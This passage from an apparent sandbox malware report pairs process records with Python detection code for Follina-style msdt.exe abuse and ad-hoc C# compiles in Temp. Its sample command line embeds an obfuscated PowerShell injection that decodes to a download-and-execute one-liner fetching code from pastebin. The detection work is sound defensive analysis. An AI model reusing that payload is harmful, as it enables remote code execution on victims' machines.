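copied from the Target ID 5 process record; function and indicator names are
this example's own choices.
"""
import base64
import binascii
import re

# Constructed sample: the msdt.exe command line from the process listing above.
SAMPLE_CMDLINE = r'''C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO'''

# Candidate Base64 runs: long enough to be a payload rather than a path fragment.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# PowerShell format operator:  'template with {0}' -f 'arg0','arg1',...
_PS_FORMAT_RE = re.compile(r"'([^']*)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)")


def msdt_indicators(cmdline: str) -> dict:
    """Return the Follina indicators present in an msdt.exe command line.

    Simplified checks in the spirit of the SUSP_PS1_Msdt_Execution_May22
    hits above; each value is True when the command line shows the indicator.
    """
    browse = re.search(r"IT_BrowseForFile=(\S*)", cmdline)
    browse_val = browse.group(1) if browse else ""
    return {
        "ms_msdt_scheme": "ms-msdt:" in cmdline.lower(),
        "pcw_diagnostic": "PCWDiagnostic" in cmdline,
        "skip_force": "/skip force" in cmdline,
        # $( ... ) inside IT_BrowseForFile is the PowerShell injection point.
        "subexpression_in_browseforfile": "$(" in browse_val,
        # The trailing ../../ path makes the parameter resolve to a real file.
        "traversal_in_browseforfile": "../" in browse_val,
        "base64_decode_call": "FromBase64String" in cmdline,
    }


def decode_base64_blobs(text: str) -> list:
    """Decode every Base64 run in text that is valid and yields printable UTF-8."""
    out = []
    for cand in _B64_RE.findall(text):
        if len(cand) % 4:          # not a whole Base64 quantum, e.g. a path piece
            continue
        try:
            s = base64.b64decode(cand, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if s.isprintable():
            out.append(s)
    return out


def expand_ps_format_expressions(text: str) -> list:
    """Evaluate each  'fmt' -f 'a','b',...  expression found in text.

    Returns the resulting strings. A {n} placeholder with no matching argument
    is left as-is rather than guessed.
    """
    results = []
    for fmt, arg_blob in _PS_FORMAT_RE.findall(text):
        args = re.findall(r"'([^']*)'", arg_blob)

        def _sub(m, args=args):
            i = int(m.group(1))
            return args[i] if i < len(args) else m.group(0)

        results.append(re.sub(r"\{(\d+)\}", _sub, fmt))
    return results


def triage(cmdline: str) -> dict:
    """Indicators, decoded Base64 and the de-obfuscated stage for one command line."""
    decoded = decode_base64_blobs(cmdline)
    expanded = []
    for blob in decoded:
        expanded.extend(expand_ps_format_expressions(blob))
    ind = msdt_indicators(cmdline)
    return {
        "indicators": ind,
        "is_follina_like": ind["ms_msdt_scheme"] and ind["subexpression_in_browseforfile"],
        "decoded_base64": decoded,
        "deobfuscated": expanded,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_CMDLINE), indent=2))
```

The -f expansion is a textual evaluation only; nothing is fetched or executed. On the sample the Base64 decodes to an iex(...) wrapper around a format expression, and expanding it exposes the irm download-and-execute one-liner, which is the kind of artefact to pivot on when hunting for the second stage in proxy logs.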

Target ID:14
Start time:08:35:53
Start date:18/08/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.cmdline
Imagebase:0x1390000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:moderate

Target ID:15
Start time:08:35:55
Start date:18/08/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP"
Imagebase:0x1010000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:16
Start time:08:35:59
Start date:18/08/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline
Imagebase:0x1390000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:moderate

Target ID:17
Start time:08:36:01
Start date:18/08/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"
Imagebase:0x1010000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:21
Start time:08:36:40
Start date:18/08/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline
Imagebase:0x1390000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

Target ID:22
Start time:08:36:42
Start date:18/08/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"
Imagebase:0x1010000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

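The two csc.exe / cvtres.exe pairs above are the footprint of an ad-hoc .NET compile (the "Compiles C# or VB.Net code" signature): the compiler is driven by a response file under the user's AppData\Local\Temp in a randomly named subdirectory, and cvtres.exe follows within seconds using an input .TMP from that same subdirectory. The detection logic below is an added example written for this report, not Joe Sandbox code. The process records are constructed from the command lines shown above (the Visual Studio build record is invented as a benign control); the function names and the 10-second pairing window are assumptions.

```python
import re
from datetime import datetime
from ntpath import basename, dirname

# Constructed process records modelled on the "Target ID" entries in this report.
# Paths, start times and command lines for the csc.exe and cvtres.exe runs are
# copied from the report; the last record is an invented build-server control case.
SAMPLE_PROCESSES = [
    {"label": "csc.exe (first run)", "start": "08:35:59",
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline'},
    {"label": "Target 17", "start": "08:36:01",
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"'},
    {"label": "Target 21", "start": "08:36:40",
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline'},
    {"label": "Target 22", "start": "08:36:42",
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"'},
    # Constructed benign control: a normal project build, response file not under Temp.
    {"label": "control (constructed)", "start": "09:00:00",
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /noconfig @"C:\Projects\App\obj\Debug\App.csproj.cmdline"'},
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# csc/vbc response file: @"<path>.cmdline" (the closing quote is missing in the
# report's command lines, so it is optional here).
RESPONSE_FILE = re.compile(r'@"?([^"\s]+\.cmdline)', re.IGNORECASE)
# cvtres input object: the last quoted argument, a .TMP file.
LAST_QUOTED_ARG = re.compile(r'"([^"]+\.tmp)"\s*$', re.IGNORECASE)


def _parse_time(hhmmss):
    return datetime.strptime(hhmmss, "%H:%M:%S")


def compiler_finding(proc):
    """Flag csc.exe/vbc.exe driven by a response file under the user's Temp directory."""
    if basename(proc["path"]).lower() not in ("csc.exe", "vbc.exe"):
        return None
    m = RESPONSE_FILE.search(proc["cmdline"])
    if not m or not TEMP_DIR.search(m.group(1)):
        return None
    return {"label": proc["label"], "kind": "adhoc_compile",
            "workdir": dirname(m.group(1)).lower(), "start": proc["start"]}


def cvtres_finding(proc):
    """Flag cvtres.exe consuming a resource object that lives under Temp."""
    if basename(proc["path"]).lower() != "cvtres.exe":
        return None
    m = LAST_QUOTED_ARG.search(proc["cmdline"])
    if not m or not TEMP_DIR.search(m.group(1)):
        return None
    return {"label": proc["label"], "kind": "resource_link",
            "workdir": dirname(m.group(1)).lower(), "start": proc["start"]}


def scan(processes, window_seconds=10):
    """One alert per ad-hoc compile, with the cvtres.exe runs that share its Temp
    working directory and start within window_seconds after it (assumed window)."""
    findings = [f for p in processes for f in (compiler_finding(p), cvtres_finding(p)) if f]
    compiles = [f for f in findings if f["kind"] == "adhoc_compile"]
    links = [f for f in findings if f["kind"] == "resource_link"]
    alerts = []
    for c in compiles:
        paired = [l["label"] for l in links
                  if l["workdir"] == c["workdir"]
                  and 0 <= (_parse_time(l["start"]) - _parse_time(c["start"])).total_seconds() <= window_seconds]
        alerts.append({"compile": c["label"], "cvtres": paired, "workdir": c["workdir"]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_PROCESSES):
        print(f"ad-hoc compile {alert['compile']} in {alert['workdir']} -> cvtres {alert['cvtres']}")
```

Pairing on the shared Temp subdirectory rather than on parent PID is deliberate: the report lists these targets without a parent, and in real telemetry the parent is usually powershell.exe or another host that a rule keyed only on process lineage would miss once the attacker changes the launcher. Exclude known build hosts by path, as the control record shows, rather than by suppressing csc.exe altogether.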
No disassembly